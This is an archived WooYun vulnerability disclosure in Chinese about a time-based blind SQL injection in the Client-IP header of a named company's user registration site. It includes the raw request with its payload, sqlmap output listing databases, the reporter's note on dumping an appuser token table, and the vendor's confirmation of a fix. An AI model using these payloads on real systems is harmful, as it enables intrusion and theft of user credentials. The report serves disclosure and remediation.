乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-28: 细节已通知厂商并且等待厂商处理中 2015-06-30: 厂商已经确认,细节仅向厂商公开 2015-07-10: 细节向核心白帽子及相关领域专家公开 2015-07-20: 细节向普通白帽子公开 2015-07-30: 细节向实习白帽子公开 2015-08-14: 细节向公众公开
天地本不仁 万物为刍狗 【HD】 以团队之名 以个人之荣耀 共建网络安全
POST数据包:
GET /register HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Client-IP: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/X-Requested-With: XMLHttpRequestReferer: http://user.chunshuitang.com/Cookie: CPSSID=hk2tviec4h7cvnklt4ahs3e9o7Host: user.chunshuitang.comConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 1400 HTTP(s) requests:---Parameter: Client-IP #1* ((custom) HEADER) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(20)))qMAz)#'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/---[13:47:05] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.12[13:47:05] [INFO] fetching database names[13:47:05] [INFO] fetching number of databases[13:47:05] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically[13:47:05] [INFO] retrieved:[13:47:05] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors2[13:47:47] [INFO] retrieved: information_schema[14:11:51] [INFO] retrieved: cavailable databases [2]:[*] c[*] information_schema[14:12:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\user.chunshuitang.com'[*] shutting down at 14:12:53
其中 C 数据库中 有70个表
看见了个 appuser 的表 顺便就跑了下
没下载过 app 不知道你们的链接规则 但是 token 应该等同于 密码了 吧 因为跑起来太慢 所以另一个数据库就没跑了
有礼物不?
危害等级:中
漏洞Rank:5
确认时间:2015-06-30 17:14
感谢洞主的反馈,问题已经得到修复,未对春水堂用户的信息安全造成影响,感谢一直以来对春水堂的关注。
暂无